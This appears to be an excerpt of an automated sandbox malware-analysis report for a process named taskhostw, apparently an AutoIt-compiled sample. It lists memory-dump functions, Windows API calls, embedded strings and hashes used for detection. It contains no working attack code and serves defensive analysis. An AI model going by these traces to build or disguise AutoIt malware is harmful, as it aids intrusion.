Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction ID: b08b0e322379132b754730a7b22eb479ec1d7eec7875a08009cfb6b9d8dc90ee
Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction Fuzzy Hash: 8EC172372151931ADF2D467AA4340BEBEA15EA27B231E076DE4B2DB1C4EF20C5B5D630

Function 02AA1310 Relevance: .3, Instructions: 331COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000003.362011694.0000000002A80000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true

Associated: 00000005.00000003.362011694.0000000002B33000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000003.362011694.0000000002B41000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_3_2a80000_taskhostw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
Instruction ID: 2e2af524692acc90fb8a71a4153f15f9ec8866d6e81e6fb9f2327a5c0634c8f4
Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
Instruction Fuzzy Hash: 38C183322051A31ADFAD4B3D84B413EBEE15E926B670A17EDD4BBCB9D4EF10C164D620

Function 02AA0EF8 Relevance: .3, Instructions: 323COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000003.362011694.0000000002A80000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true

Associated: 00000005.00000003.362011694.0000000002B33000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000003.362011694.0000000002B41000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_3_2a80000_taskhostw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction ID: 1d3ef08fd9bd41d5c1b259fb62367a1c21db6786606c3a986d842b80ed7f8b8d
Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction Fuzzy Hash: 89C183322051A319DFAD4B39C4B413EFEE15E926B671A07ADD4B7DB9C4EF20C168C620

Function 00D7A60C Relevance: 49.8, APIs: 33, Instructions: 260COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 00D7A662
GetSysColorBrush.USER32 ref: 00D7A693
GetSysColor.USER32(0000000F,?,?,?,?,?,?,?,?,?,?,?,?,00D2BABA,?,?), ref: 00D7A69F
SetBkColor.GDI32(?,000000FF), ref: 00D7A6B9
SelectObject.GDI32(?,00000000), ref: 00D7A6C8
InflateRect.USER32 ref: 00D7A6F3
GetSysColor.USER32(00000010,?,?,?,?,?,?,?,?,?,?,?,?,00D2BABA,?,?), ref: 00D7A6FB
CreateSolidBrush.GDI32(00000000), ref: 00D7A702
FrameRect.USER32 ref: 00D7A711
DeleteObject.GDI32(00000000), ref: 00D7A718
InflateRect.USER32 ref: 00D7A763
FillRect.USER32 ref: 00D7A795
GetWindowLongW.USER32(?,000000F0), ref: 00D7A7C0

Part of subcall function 00D7A8FC: GetSysColor.USER32(00000012,00000000,?,?,?,?,?,?,?,?,?,00D7A62C,?,?,00000000,?), ref: 00D7A935
Part of subcall function 00D7A8FC: SetTextColor.GDI32(?,?), ref: 00D7A939
Part of subcall function 00D7A8FC: GetSysColorBrush.USER32 ref: 00D7A94F
Part of subcall function 00D7A8FC: GetSysColor.USER32(0000000F,?,?,?,?,?,?,?,00D7A62C,?,?,00000000,?,?), ref: 00D7A95A
Part of subcall function 00D7A8FC: GetSysColor.USER32(00000011,?,?,?,?,?,?,?,00D7A62C,?,?,00000000,?,?), ref: 00D7A977
Part of subcall function 00D7A8FC: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00D7A985
Part of subcall function 00D7A8FC: SelectObject.GDI32(?,00000000), ref: 00D7A996
Part of subcall function 00D7A8FC: SetBkColor.GDI32(?,00000000), ref: 00D7A99F
Part of subcall function 00D7A8FC: SelectObject.GDI32(?,?), ref: 00D7A9AC
Part of subcall function 00D7A8FC: InflateRect.USER32 ref: 00D7A9CB
Part of subcall function 00D7A8FC: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00D7A9E2
Part of subcall function 00D7A8FC: GetWindowLongW.USER32(00000000,000000F0), ref: 00D7A9F7
Part of subcall function 00D7A8FC: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00D7AA1F

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
String ID:
API String ID: 3521893082-0
Opcode ID: 511929f295683534ea4f08071bcaa16777d7ccda5b4b7d2a1e2f0d38783ed165
Instruction ID: 748d0962615d3af72ea074aa528ae3912afd67130195a434f40ca8bec90ec11b
Opcode Fuzzy Hash: 511929f295683534ea4f08071bcaa16777d7ccda5b4b7d2a1e2f0d38783ed165
Instruction Fuzzy Hash: DE917071008301EFD7209F64DC48E5F7BA9FF88321F144A29F95AD62A1E771D985CB62

Function 00CF2C18 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32 ref: 00CF2CA2
DeleteObject.GDI32(00000000), ref: 00CF2CE8
DeleteObject.GDI32(00000000), ref: 00CF2CF3
DestroyIcon.USER32(00000000,?,?,?), ref: 00CF2CFE
DestroyWindow.USER32 ref: 00CF2D09
SendMessageW.USER32(?,00001308,?,00000000), ref: 00D2C5BB
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00D2C5F4
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00D2CA1D

Part of subcall function 00CF1B41: InvalidateRect.USER32(?,00000000,00000001), ref: 00CF1B9A

SendMessageW.USER32(?,00001053), ref: 00D2CA5A
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00D2CA71
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00D2CA87
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00D2CA92

Strings

0, xrefs: 00D2C8B1

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
String ID: 0
API String ID: 464785882-4108050209
Opcode ID: 0dfadd05784587389fd6e901c358bcb441e3cb06e4d44cfa2d13447adcd641d5
Instruction ID: 2cef26168bf910625473f77300b123cf47f3776f9917047a8efd2e3b74a8718c
Opcode Fuzzy Hash: 0dfadd05784587389fd6e901c358bcb441e3cb06e4d44cfa2d13447adcd641d5
Instruction Fuzzy Hash: B312AD30210225EFDB24CF24D884BADBBA5FF14305F585569E999CB262C731EC81DFA2

Function 00D5AD9C Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00D5ADAA
GetDriveTypeW.KERNEL32(?,00D7FAC0,?,\\.\,00D7F910), ref: 00D5AE87
SetErrorMode.KERNEL32(00000000,00D7FAC0,?,\\.\,00D7F910), ref: 00D5AFE5

Strings

RAMDisk, xrefs: 00D5AEB1
SSA, xrefs: 00D5AF6E
SSD, xrefs: 00D5AF12
Fibre, xrefs: 00D5AF75
Removable, xrefs: 00D5AED9
SATA, xrefs: 00D5AF98
1394, xrefs: 00D5AF67
SCSI, xrefs: 00D5AF52
iSCSI, xrefs: 00D5AF8A
ATA, xrefs: 00D5AF60
Fixed, xrefs: 00D5AECF
USB, xrefs: 00D5AF7C
Unknown, xrefs: 00D5AEA7, 00D5AF4B
Network, xrefs: 00D5AEC5
PhysicalDrive, xrefs: 00D5AE33
\\.\, xrefs: 00D5ADFC
ATAPI, xrefs: 00D5AF59
MMC, xrefs: 00D5AFA6
RAID, xrefs: 00D5AF83
CDROM, xrefs: 00D5AEBB
Virtual, xrefs: 00D5AFAD
FileBackedVirtual, xrefs: 00D5AFB4
SAS, xrefs: 00D5AF91

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: f5da62cf6a0dcc4e72341d4c940d943162747e0c40b6140fa4e8c12460c035f1
Instruction ID: f0e9ab04e5b01e0a333090f3099a90164f4e3d6e3f5f2976a8ff036088e3bb57
Opcode Fuzzy Hash: f5da62cf6a0dcc4e72341d4c940d943162747e0c40b6140fa4e8c12460c035f1
Instruction Fuzzy Hash: 89516FB46482199FCF10EB18C992979B3B0EF153027248257FE46A7291DB70DD49EB73

Function 00CF6A3C Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00CF6A91
__wcsnicmp.LIBCMT ref: 00CF6AA9
__wcsnicmp.LIBCMT ref: 00CF6AC1
__wcsnicmp.LIBCMT ref: 00CF6AD9
__wcsnicmp.LIBCMT ref: 00CF6AF1
__wcsnicmp.LIBCMT ref: 00CF6B09
__wcsnicmp.LIBCMT ref: 00CF6B21
__wcsnicmp.LIBCMT ref: 00CF6B35
__wcsnicmp.LIBCMT ref: 00CF6B76
__wcsnicmp.LIBCMT ref: 00CF6B8A
__wcsnicmp.LIBCMT ref: 00CF6B9E
__wcsnicmp.LIBCMT ref: 00CF6BB2

Strings

#comments-start, xrefs: 00CF6B1B, 00CF6B70
#pragma compile, xrefs: 00CF6A8B
#notrayicon, xrefs: 00CF6AA3
#OnAutoItStartRegister, xrefs: 00CF6AD3
#ce, xrefs: 00CF6BAC
Cannot parse #include, xrefs: 00D2E749
#cs, xrefs: 00CF6B2F, 00CF6B84
Unterminated group of comments, xrefs: 00D2E75C
Bad directive syntax error, xrefs: 00D2E673
#include, xrefs: 00CF6B03
#comments-end, xrefs: 00CF6B98
#requireadmin, xrefs: 00CF6ABB
#include-once, xrefs: 00CF6AEB

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 1038674560-86951937
Opcode ID: df860e173d3ab7c7737da2ffda7b5ada072268644d405b3387b5e22d64da7383
Instruction ID: 752fdbbb8a5b01dda5850e7f9c63af8e7ffd0153e81990d175678a230ecefb41
Opcode Fuzzy Hash: df860e173d3ab7c7737da2ffda7b5ada072268644d405b3387b5e22d64da7383
Instruction Fuzzy Hash: 57813C70600219BBCB60BF61DD83FBE7768EF25704F044024FA45AA193EB60DA55E6B2

Function 00D7A8FC Relevance: 39.2, APIs: 26, Instructions: 187windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012,00000000,?,?,?,?,?,?,?,?,?,00D7A62C,?,?,00000000,?), ref: 00D7A935
SetTextColor.GDI32(?,?), ref: 00D7A939
GetSysColorBrush.USER32 ref: 00D7A94F
GetSysColor.USER32(0000000F,?,?,?,?,?,?,?,00D7A62C,?,?,00000000,?,?), ref: 00D7A95A
CreateSolidBrush.GDI32(?), ref: 00D7A95F
GetSysColor.USER32(00000011,?,?,?,?,?,?,?,00D7A62C,?,?,00000000,?,?), ref: 00D7A977
CreatePen.GDI32(00000000,00000001,00743C00), ref: 00D7A985
SelectObject.GDI32(?,00000000), ref: 00D7A996
SetBkColor.GDI32(?,00000000), ref: 00D7A99F
SelectObject.GDI32(?,?), ref: 00D7A9AC
InflateRect.USER32 ref: 00D7A9CB
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00D7A9E2
GetWindowLongW.USER32(00000000,000000F0), ref: 00D7A9F7
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00D7AA1F
GetWindowTextW.USER32(00000000,00000000,00000001,?,?,?,?,?,?,?,00D7A62C,?,?,00000000,?,?), ref: 00D7AA46
InflateRect.USER32 ref: 00D7AA64
DrawFocusRect.USER32 ref: 00D7AA6F
GetSysColor.USER32(00000011,?,?,?,?,?,?,?,00D7A62C), ref: 00D7AA7D
SetTextColor.GDI32(?,00000000), ref: 00D7AA85
DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00D7AA99
SelectObject.GDI32(?,00D7A62C), ref: 00D7AAB0
DeleteObject.GDI32(?), ref: 00D7AABB
SelectObject.GDI32(?,?), ref: 00D7AAC1
DeleteObject.GDI32(?), ref: 00D7AAC6
SetTextColor.GDI32(?,?), ref: 00D7AACC
SetBkColor.GDI32(?,?), ref: 00D7AAD6

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: 35f274797db4edf367a5bc3d6bf4014ace4b62bcbea9059366d149716bf2c25c
Instruction ID: 881c12fed030bfda53e9ba7c9f68b02c7cbf45dd458081755cf4824c50e9213c
Opcode Fuzzy Hash: 35f274797db4edf367a5bc3d6bf4014ace4b62bcbea9059366d149716bf2c25c
Instruction Fuzzy Hash: 23512D71900218FFDB119FA8DC49AAE7B79EF48320F158525F919EB2A1E7719980CF60

Function 00D78A07 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00D78AF3
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00D78B04
CharNextW.USER32(0000014E), ref: 00D78B33
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00D78B74
SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00D78B8A
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00D78B9B
SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00D78BB8
SetWindowTextW.USER32(?,0000014E,?,?,?,?,?), ref: 00D78C0A
SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00D78C20
SendMessageW.USER32(?,00001002,00000000,?), ref: 00D78C51
_memset.LIBCMT ref: 00D78C76
SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00D78CBF
_memset.LIBCMT ref: 00D78D1E
SendMessageW.USER32(?,00001053,000000FF,?), ref: 00D78D48
SendMessageW.USER32(?,00001074,?,00000001), ref: 00D78DA0
SendMessageW.USER32(?,0000133D,?,?), ref: 00D78E4D
InvalidateRect.USER32(?,00000000,00000001), ref: 00D78E6F
GetMenuItemInfoW.USER32 ref: 00D78EB9
SetMenuItemInfoW.USER32 ref: 00D78EE6
DrawMenuBar.USER32(?), ref: 00D78EF5
SetWindowTextW.USER32(?,0000014E,?,?,?,?,?), ref: 00D78F1D

Strings

0, xrefs: 00D78E87

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
String ID: 0
API String ID: 1073566785-4108050209
Opcode ID: 3737032225d315ed6fa840f89279fa4549b09e2d235c4bc41ad6fc4c28e40c51
Instruction ID: 6d31a0bccf8f437c4d1a75869a620e1c6dffb1618ac1b5a5d2a1757375558623
Opcode Fuzzy Hash: 3737032225d315ed6fa840f89279fa4549b09e2d235c4bc41ad6fc4c28e40c51
Instruction Fuzzy Hash: E1E19070941218AFDF219F60DC88EEE7BB9FF05750F148156F959AA290EB708981EF70

Function 00D748F8 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00D74A33
GetDesktopWindow.USER32 ref: 00D74A48
GetWindowRect.USER32(00000000), ref: 00D74A4F
GetWindowLongW.USER32(?,000000F0), ref: 00D74AB1
DestroyWindow.USER32 ref: 00D74ADD
CreateWindowExW.USER32 ref: 00D74B06
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00D74B24
SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00D74B4A
SendMessageW.USER32(?,00000421,?,?), ref: 00D74B5F
SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00D74B72
IsWindowVisible.USER32(?), ref: 00D74B92
SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00D74BAD
SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00D74BC1
GetWindowRect.USER32(?,?), ref: 00D74BD9
MonitorFromPoint.USER32(?,?,00000002), ref: 00D74BFF
GetMonitorInfoW.USER32(00000000,?), ref: 00D74C19
CopyRect.USER32(?,?), ref: 00D74C30
SendMessageW.USER32(?,00000412,00000000), ref: 00D74C9B

Strings

tooltips_class32, xrefs: 00D74AFF
0, xrefs: 00D749DE
(, xrefs: 00D74C0C

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: 579b5609dce1474bf1b837ff7ec3078cd5103d3a2b025c8de75827386550812d
Instruction ID: c04e9040251ec53273dbafa45750baec08116113414892dfcff60d0c6ad7a94c
Opcode Fuzzy Hash: 579b5609dce1474bf1b837ff7ec3078cd5103d3a2b025c8de75827386550812d
Instruction Fuzzy Hash: 40B18A70604301AFDB45DF24C885B6ABBE4FF88314F04891CF69D9B2A1E770E804CBA6

Function 00D544DB Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 00D544ED
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00D54513
_wcscpy.LIBCMT ref: 00D54541
_wcscmp.LIBCMT ref: 00D5454C
_wcscat.LIBCMT ref: 00D54562
_wcsstr.LIBCMT ref: 00D5456D
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00D54589
_wcscat.LIBCMT ref: 00D545D2
_wcscat.LIBCMT ref: 00D545D9
_wcsncpy.LIBCMT ref: 00D54604

Strings

DefaultLangCodepage, xrefs: 00D545EC
\VarFileInfo\Translation, xrefs: 00D54581
StringFileInfo\, xrefs: 00D5455C
%u.%u.%u.%u, xrefs: 00D54667
04090000, xrefs: 00D545BF

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 699586101-1459072770
Opcode ID: 8589dc773f5b46b59b2e453a3b69ac25fab7897f4000cc0d1dd00f3ba7413ea7
Instruction ID: 6e50f5e7a8989141a45df43c4a0d160fa24e84ee7b394208bf056ac2e20392c0
Opcode Fuzzy Hash: 8589dc773f5b46b59b2e453a3b69ac25fab7897f4000cc0d1dd00f3ba7413ea7
Instruction Fuzzy Hash: 4941E2729042047EEB20BB64AC43EFF766CDF45311F044066FC08E6182FF719A9696BA

Function 00CF27D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00CF28BC
GetSystemMetrics.USER32(00000007), ref: 00CF28C4
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00CF28EF
GetSystemMetrics.USER32(00000008), ref: 00CF28F7
GetSystemMetrics.USER32(00000004), ref: 00CF291C
SetRect.USER32 ref: 00CF2939
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00CF2949
CreateWindowExW.USER32 ref: 00CF297C
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00CF2990
GetClientRect.USER32(00000000,000000FF), ref: 00CF29AE
GetStockObject.GDI32(00000011), ref: 00CF29CA
SendMessageW.USER32(00000000,00000030,00000000), ref: 00CF29D5

Part of subcall function 00CF2344: GetCursorPos.USER32(?), ref: 00CF2357
Part of subcall function 00CF2344: ScreenToClient.USER32(00DB57B0,?), ref: 00CF2374
Part of subcall function 00CF2344: GetAsyncKeyState.USER32 ref: 00CF2399
Part of subcall function 00CF2344: GetAsyncKeyState.USER32 ref: 00CF23A7

SetTimer.USER32(00000000,00000000,00000028,00CF1256), ref: 00CF29FC

Strings

AutoIt v3 GUI, xrefs: 00CF2974

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362341565.0000000000DAE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362346633.0000000000DB7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_cf0000_taskhostw.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: 323a8e66b0e800420cdfd5e9801c859263ed972b7dca5d0e83a8437198df6840
Instruction ID: 63d9f28703aa9a63e41a87deac414d518a2b6f87f66ede5b601a93a88a1c3c0b
Opcode Fuzzy Hash: 323a8e66b0e800420cdfd5e9801c859263ed972b7dca5d0e83a8437198df6840
Instruction Fuzzy Hash: F6B14B71A0020AEFDB24DFA8DC45BAD7BB5FB08314F104229FA15E72A0DB74D940CB61

Function 00D4A844 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 00D4A885
__swprintf.LIBCMT ref: 00D4A926
_wcscmp.LIBCMT ref: 00D4A939
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00D4A98E
_wcscmp.LIBCMT ref: 00D4A9CA
GetClassNameW.USER32(?,?,00000400), ref: 00D4AA01
GetDlgCtrlID.USER32 ref: 00D4AA53
GetWindowRect.USER32(?,?), ref: 00D4AA89
GetParent.USER32(?), ref: 00D4AAA7
ScreenToClient.USER32(00000000), ref: 00D4AAAE
GetClassNameW.USER32(?,?,00000100), ref: 00D4AB28
_wcscmp.LIBCMT ref: 00D4AB3C
GetWindowTextW.USER32(?,?,00000400), ref: 00D4AB62
_wcscmp.LIBCMT ref: 00D4AB76

Part of subcall function 00D137AC: _iswctype.LIBCMT ref: 00D137B4

Strings

%s%u, xrefs: 00D4A920

Memory Dump Source

Source File: 00000005.00000002.362301346.0000000000CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000005.00000002.362266916.0000000000CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000D7F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.362327806.0000000000DA4000.00000002.00000001.01000000.00000005.sdmpDownload File
